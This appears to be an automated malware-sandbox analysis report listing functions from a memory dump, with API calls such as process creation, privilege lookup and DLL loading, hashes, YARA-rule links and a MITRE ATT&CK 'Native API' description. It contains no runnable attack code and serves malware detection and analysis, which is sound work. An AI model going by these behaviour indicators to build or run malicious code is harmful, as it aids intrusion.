Associated: 00000009.00000002.935684469.000000000330B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d01fd252c9d487c567f0f16ab9fa34738d6365452b46a3a04b30b78b554710b6
Instruction ID: 71d47a8aca6fc8347af492d92a1bbd01b8371f5d5c4553df510fd1e8c7ee36d6
Opcode Fuzzy Hash: d01fd252c9d487c567f0f16ab9fa34738d6365452b46a3a04b30b78b554710b6
Instruction Fuzzy Hash: 019002A135104C42D100A16A4414B060005DBE1341F51C015E1054554D8B59CCD271A6

Uniqueness

Uniqueness Score: -1.00%

Function 03259860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0325986A

Memory Dump Source

Source File: 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, Offset: 031F0000, based on PE: true

Associated: 00000009.00000002.935684469.000000000330B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 15e3e6dd654ca908ed5971d2f9fdb71ff26fe6332ff5ec7f026ef3474f7ff3db
Instruction ID: b8d4e425fadf61cb86a4b8ea619b0bbe415a69dbd8b0f657336d42ef2e5f02bf
Opcode Fuzzy Hash: 15e3e6dd654ca908ed5971d2f9fdb71ff26fe6332ff5ec7f026ef3474f7ff3db
Instruction Fuzzy Hash: 6D90027131104C13D111A16A450470700099BD0281F91C412A0414558D9B9689D2B1A1

Uniqueness

Uniqueness Score: -1.00%

Function 03259840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0325984A

Memory Dump Source

Source File: 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, Offset: 031F0000, based on PE: true

Associated: 00000009.00000002.935684469.000000000330B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3e3a0cc7024367e3abd6d34499c9e2da6badb618c61f56efc7ad354f6cb79b
Instruction ID: 34a203677d10e1fefa680adf9d4dad6b3078872898b9520b5f32a68baca446b5
Opcode Fuzzy Hash: 3f3e3a0cc7024367e3abd6d34499c9e2da6badb618c61f56efc7ad354f6cb79b
Instruction Fuzzy Hash: 3F90026135208D525545F16A44045074006ABE0281791C012A1404950C8A6698D6E6A1

Uniqueness

Uniqueness Score: -1.00%

Function 03259710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0325971A

Memory Dump Source

Source File: 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, Offset: 031F0000, based on PE: true

Associated: 00000009.00000002.935684469.000000000330B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 37aafdae071088d4db47b8428762110e888e32d02d10a66e905227a9bc165406
Instruction ID: 7e4582689fa835e2c283a54834cf79cb91ee5fac6f0cf9876b79583eff6d7ee2
Opcode Fuzzy Hash: 37aafdae071088d4db47b8428762110e888e32d02d10a66e905227a9bc165406
Instruction Fuzzy Hash: 3390027131104C02D100A5AA540864600059BE0341F51D011A5014555ECBA588D171B1

Uniqueness

Uniqueness Score: -1.00%

Function 03259780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0325978A

Memory Dump Source

Source File: 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, Offset: 031F0000, based on PE: true

Associated: 00000009.00000002.935684469.000000000330B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dba3704537c3d6af4958fdc4e8538e964de0ac111d9d14ae33ef2d7dc85c1316
Instruction ID: b1022f55585afe897cd34ad22cbaa96054e707467c472a066b14092602d615cc
Opcode Fuzzy Hash: dba3704537c3d6af4958fdc4e8538e964de0ac111d9d14ae33ef2d7dc85c1316
Instruction Fuzzy Hash: 7F90026932304C02D180B16A540860A00059BD1242F91D415A0005558CCE5588E963A1

Uniqueness

Uniqueness Score: -1.00%

Function 03259FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03259FEA

Memory Dump Source

Source File: 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, Offset: 031F0000, based on PE: true

Associated: 00000009.00000002.935684469.000000000330B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3bb9264c8229056de2feed958b35329086db856b95322584e76bb1ab2962e92e
Instruction ID: a5801f9df0dcfac0dc9c9f168c2a68c3ab1a1cd089c3433fb0624ffcfcaa0413
Opcode Fuzzy Hash: 3bb9264c8229056de2feed958b35329086db856b95322584e76bb1ab2962e92e
Instruction Fuzzy Hash: 2090027132118C02D110A16A840470600059BD1241F51C411A0814558D8BD588D171A2

Uniqueness

Uniqueness Score: -1.00%

Function 03259660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0325966A

Memory Dump Source

Source File: 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, Offset: 031F0000, based on PE: true

Associated: 00000009.00000002.935684469.000000000330B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 090676e460a3350f395aaa4f28bf2b511be186e458b80815a10f2a8f397addd9
Instruction ID: 355bc9e5c281365355a8ddd66eb02c86aecdd337562ea8be4327a626e1578a90
Opcode Fuzzy Hash: 090676e460a3350f395aaa4f28bf2b511be186e458b80815a10f2a8f397addd9
Instruction Fuzzy Hash: D690027131104C02D180B16A440464A00059BD1341F91C015A0015654DCF558AD977E1

Uniqueness

Uniqueness Score: -1.00%

Function 03259650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0325965A

Memory Dump Source

Source File: 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, Offset: 031F0000, based on PE: true

Associated: 00000009.00000002.935684469.000000000330B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f937db054038f225027d64b2166946643abaa19cd233c58288a0bc86f39a651
Instruction ID: 34197e859f8a078bf15a4133ac63a3f829b1c8c5a41d9f4b40c4c123c557a101
Opcode Fuzzy Hash: 3f937db054038f225027d64b2166946643abaa19cd233c58288a0bc86f39a651
Instruction Fuzzy Hash: A290027131508C42D140B16A4404A4600159BD0345F51C011A0054694D9B658DD5B6E1

Uniqueness

Uniqueness Score: -1.00%

Function 032596E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 032596EA

Memory Dump Source

Source File: 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, Offset: 031F0000, based on PE: true

Associated: 00000009.00000002.935684469.000000000330B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b24482ebbde105371c4962441370e0d81af42924dfb44ea33a78382785462e4a
Instruction ID: 7ad2bf559051162fa582f860b1237ab5e895fb358cc3d6d9648600feb23423e3
Opcode Fuzzy Hash: b24482ebbde105371c4962441370e0d81af42924dfb44ea33a78382785462e4a
Instruction Fuzzy Hash: FC9002713110CC02D110A16A840474A00059BD0341F55C411A4414658D8BD588D171A1

Uniqueness

Uniqueness Score: -1.00%

Function 032596D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 032596DA

Memory Dump Source

Source File: 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, Offset: 031F0000, based on PE: true

Associated: 00000009.00000002.935684469.000000000330B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 293b891ae2ab60cfda1fb687e215b342ff44884e50253c22c7b37281ebc13a4a
Instruction ID: 0631f0d8efae6c8f978e7c208a7c72baa6de72225d1185683c34b3478018c27e
Opcode Fuzzy Hash: 293b891ae2ab60cfda1fb687e215b342ff44884e50253c22c7b37281ebc13a4a
Instruction Fuzzy Hash: 9C90027131104C42D100A16A4404B4600059BE0341F51C016A0114654D8B55C8D175A1

Uniqueness

Uniqueness Score: -1.00%

Function 03259540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0325954A

Memory Dump Source

Source File: 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, Offset: 031F0000, based on PE: true

Associated: 00000009.00000002.935684469.000000000330B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 51a288584b2af59da39fbe91536b60ff68d7c432cad924c570d29b458a262d36
Instruction ID: be41861cf2b834e929b738ea87c787423fbad766d843ca1b09bfb7e65ae84ca5
Opcode Fuzzy Hash: 51a288584b2af59da39fbe91536b60ff68d7c432cad924c570d29b458a262d36
Instruction Fuzzy Hash: 4C90026532104C030105E56A070450700469BD5391351C021F1005550CDB6188E161A1

Uniqueness

Uniqueness Score: -1.00%

Function 032595D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 032595DA

Memory Dump Source

Source File: 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, Offset: 031F0000, based on PE: true

Associated: 00000009.00000002.935684469.000000000330B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 89a44fae05c726d56b62a08443c14c582dbc75dcca4996e3cd8a55fc451bae0a
Instruction ID: 1ea9217309ef3e9428b3eb001dc501dd3eb0b115c799d66690c9ccd75d84e866
Opcode Fuzzy Hash: 89a44fae05c726d56b62a08443c14c582dbc75dcca4996e3cd8a55fc451bae0a
Instruction Fuzzy Hash: 829002A131204C034105B16A4414616400A9BE0241B51C021E1004590DCA6588D171A5

Uniqueness

Uniqueness Score: -1.00%

Function 00767236, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 007672EA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0076730B

Strings

3333, xrefs: 0076724E

Memory Dump Source

Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID: 3333
API String ID: 1836367815-2924271548
Opcode ID: 7784a5e73a2b686eaf7b9eb8f1ea48fc55b268dd23c5eb9014d6ac332d7b2eca
Instruction ID: e8aecfd71455fcce3516ab8e1878eca2f53c9c1e15ba522e0bf2315594303d83
Opcode Fuzzy Hash: 7784a5e73a2b686eaf7b9eb8f1ea48fc55b268dd23c5eb9014d6ac332d7b2eca
Instruction Fuzzy Hash: E90170317452657AEF29666C5C03F7E73585F01F79F088059FF09EA2C1D588A80082E6

Uniqueness

Uniqueness Score: -1.00%

Function 00777310, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 007773B8

Strings

net.dll, xrefs: 00777381, 00777407, 007773DF, 007773EB, 00777413
wininet.dll, xrefs: 0077736E, 00777377

Memory Dump Source

Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 518fc8f24b6a85ed2c890773514a1d781a851099ff357bd916509a1191406c98
Instruction ID: a59225bef2287086859ca9ef4f78111b208c96c1a7a6e2ef035bfd6b6f099901
Opcode Fuzzy Hash: 518fc8f24b6a85ed2c890773514a1d781a851099ff357bd916509a1191406c98
Instruction Fuzzy Hash: BC31AFB6501604ABDB15EF68C8A5FABB7B8BF88740F00C11DFA1E5B241D734A505CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0077730C, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 007773B8

Strings

net.dll, xrefs: 00777381, 007773DF, 007773EB
wininet.dll, xrefs: 0077736E, 00777377

Memory Dump Source

Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 6dafd856b53374bf6a073f809a54d2df72253538d87e58f8c2b9ae1d858c7c4a
Instruction ID: 96106bfee1244b8dae181303df78437f2ec7eaebc0ef09a699b6275f7b9e2af6
Opcode Fuzzy Hash: 6dafd856b53374bf6a073f809a54d2df72253538d87e58f8c2b9ae1d858c7c4a
Instruction Fuzzy Hash: 5921C1B1501600BBDB14DF68C8A5F6BB7B8BF48740F00C019FA1D5B241D774A505CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00778A05, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0076CFD2,0076CFD2,?,00000000,?,?), ref: 00778A90

Strings

vP, xrefs: 00778A2F, 00778A3B

Memory Dump Source

Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID: vP
API String ID: 3899507212-2141600579
Opcode ID: 1c991dbe0f34a82c829924634d7487e1fc13deeda80b93b96dfb29edaa193f82
Instruction ID: 967cdd6bb1c24f4666000b9f2f3dc79540d0183e416fd31d797e3eb7cd3ee07e
Opcode Fuzzy Hash: 1c991dbe0f34a82c829924634d7487e1fc13deeda80b93b96dfb29edaa193f82
Instruction Fuzzy Hash: 7C019AB5200249ABCB14DF58DC84EEB77A9AF88354F018519FE4C93342D634E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 007788C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(F5w,?,00773CBF,00773CBF,?,00773546,?,?,?,?,?,00000000,00000000,?), ref: 007788ED

Strings

F5w, xrefs: 007788E2, 007788EC

Memory Dump Source

Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID: F5w
API String ID: 1279760036-3875933769
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 0e4d9045e2c551c6660bb07d54356c5a26482ba0506c77ddeb73c80c4a26961d
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: A4E012B1201208ABDB14EF99CC85EA777ADAF88650F118558BE085B242C630F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00778900, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00763B93), ref: 0077892D

Strings

.z`, xrefs: 0077891C, 00778928

Memory Dump Source

Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 2ec331b70c60da464b1f31881caccdf05e3e15284440ee48df6b74c6d0a56e46
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: E5E046B1200208ABDB18EF99CC89EA777ADEF88750F018558FE0C5B242D630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 00767290, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 007672EA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0076730B

Memory Dump Source

Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 0737a639ca5368aea326ec11c9ecbaa5531f8086b4e24e23c41de1bbb4828753
Instruction ID: 1d96c55802a77d1e576ad0e8d3e881963f785001438304812528a61d30fae622
Opcode Fuzzy Hash: 0737a639ca5368aea326ec11c9ecbaa5531f8086b4e24e23c41de1bbb4828753
Instruction Fuzzy Hash: 0C01AC31A80228B6FB21A6949C07FBE776C5B40B55F144114FF08BA1C1E6D8690547F6

Uniqueness

Uniqueness Score: -1.00%

Function 00769B50, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00769BC2

Memory Dump Source

Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction ID: a511423dfc417bb2bb0ce590baaca17a5e2361f5ae2315979529d7c81dbe548c
Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction Fuzzy Hash: FD010CB5D0020DABDF10EAA4EC46F9DB7B89B54348F0081A5EE0DAB241F675EA548B91

Uniqueness

Uniqueness Score: -1.00%

Function 00778970, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 007789C4

Memory Dump Source

Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 9782a50ef3d0e0d484c3e1c03bf7a224eb6a27e90c244287ba92847572a925b6
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: D401AFB2211108ABCB54DF89DC84EEB77ADAF8C754F158258BA0D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0077896D, Relevance: 1.5, APIs: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 007789C4

Memory Dump Source

Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: f29a0452725638ed6e1581a56fe42c7d91e9623d5a8452631fa176c74b16a939
Instruction ID: 59890c9b9a95399ac32ad228c42ada1c1cc1e9fb6346a68bc2bf58f53014683a
Opcode Fuzzy Hash: f29a0452725638ed6e1581a56fe42c7d91e9623d5a8452631fa176c74b16a939
Instruction Fuzzy Hash: 4701F2B2215149AFCB44DF88DC80DEB37B9AF8C310F158258FE5DA7251C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00777440, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0076CD00,?,?), ref: 0077747C

Memory Dump Source

Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 1ac512526623b80ff2eba0762e65234b0e82283f1c3bdfce6fab76a013c5e1df
Instruction ID: 95c3e1802b85c0cae153c10462a625e25fa37a3c4dcb33c8b5c480263493f03b
Opcode Fuzzy Hash: 1ac512526623b80ff2eba0762e65234b0e82283f1c3bdfce6fab76a013c5e1df
Instruction Fuzzy Hash: ADE092733803147AE730659D9C03FA7B39CDB81BA0F554026FA0DEB2C1D599F80142A5

Uniqueness

Uniqueness Score: -1.00%

Function 0077743A, Relevance: 1.5, APIs: 1, Instructions: 30threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0076CD00,?,?), ref: 0077747C

Memory Dump Source

Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 06f9cb33e124515374b22989773891f77673ad4e807a5cc0467767f3f482a79a
Instruction ID: 5332a5cf34c085f2061435cc31f16bcf03350e1d3e13129cc8de301bd87c2ef6
Opcode Fuzzy Hash: 06f9cb33e124515374b22989773891f77673ad4e807a5cc0467767f3f482a79a
Instruction Fuzzy Hash: D4E0DF7638020076EB3066988C53FA766699F80F90F654029FA0DAB2C1C9A9FC0143A4

Uniqueness

Uniqueness Score: -1.00%

Function 00778A51, Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0076CFD2,0076CFD2,?,00000000,?,?), ref: 00778A90

Memory Dump Source

Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: a0ced96a1648c519759b4fb397f17092db05da4af02dff2655966d0a030e3e74
Instruction ID: ddacfec6805516db51d7fe1fb668bf5c7801a81c359c621f50da831a35d53a48
Opcode Fuzzy Hash: a0ced96a1648c519759b4fb397f17092db05da4af02dff2655966d0a030e3e74
Instruction Fuzzy Hash: 54E022B42042152BDB08DB198D89EBB7BAAEF81350F14895EFD8D9B203C034E81587B0

Uniqueness

Uniqueness Score: -1.00%

Function 00778A60, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0076CFD2,0076CFD2,?,00000000,?,?), ref: 00778A90

Memory Dump Source

Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 023b24aee9157a42ff46bf6ff66d86c9faab80822a8a7ff39316bff208034db6
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 0BE01AB1200208ABDB10DF49CC85EE737ADAF88650F018154BE0C57242D934E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0076D440, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00767C93,?), ref: 0076D46B

Memory Dump Source

Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction ID: 422e548f6c48a36fca7e8d74bee32209707ebedfcf21aa8f118eb54f556970f3
Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction Fuzzy Hash: 19D05E617503086AEA10AAA89C07F2632885B44B44F494064F94AA72C3D964E9004161

Uniqueness

Uniqueness Score: -1.00%

Function 0325967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03259694

Memory Dump Source

Source File: 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, Offset: 031F0000, based on PE: true

Associated: 00000009.00000002.935684469.000000000330B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c427e0ca437ad60eed4d5817d66b86bff1916fd733598b5ff203b7e1498be91f
Instruction ID: e8a0f298ed163755468a3dee0dc2ee9e0d88f3bd4f20dfeab5b0338d8948d84c
Opcode Fuzzy Hash: c427e0ca437ad60eed4d5817d66b86bff1916fd733598b5ff203b7e1498be91f
Instruction Fuzzy Hash: 6CB09B719124CEC5D611D771460871779447BD0751F16C051E1020641B4778C1D5F5F5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 032AFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E032AFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0325CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E032A5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E032A5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x032afdda
0x032afde2
0x032afde5
0x032afdec
0x032afdfa
0x032afdff
0x032afe0a
0x032afe0f
0x032afe17
0x032afe1e
0x032afe19
0x032afe19
0x032afe19
0x032afe20
0x032afe21
0x032afe22
0x032afe25
0x032afe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 032AFDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 032AFE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 032AFE01

Memory Dump Source

Source File: 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, Offset: 031F0000, based on PE: true

Associated: 00000009.00000002.935684469.000000000330B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 65c30dc442c49d0bfa1a4f7a378049738823e39f64f6f48b0e1dfc6cf3857cf6
Instruction ID: 0a436afcb305db44d5f15464c4031e509c05d2a0adef69b8e1f2a52ea5e33802
Opcode Fuzzy Hash: 65c30dc442c49d0bfa1a4f7a378049738823e39f64f6f48b0e1dfc6cf3857cf6
Instruction Fuzzy Hash: A7F04636210701BFDB209A49CD06F37FF5AEB40730F240315F6285A5D2EAA2F8A082F0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

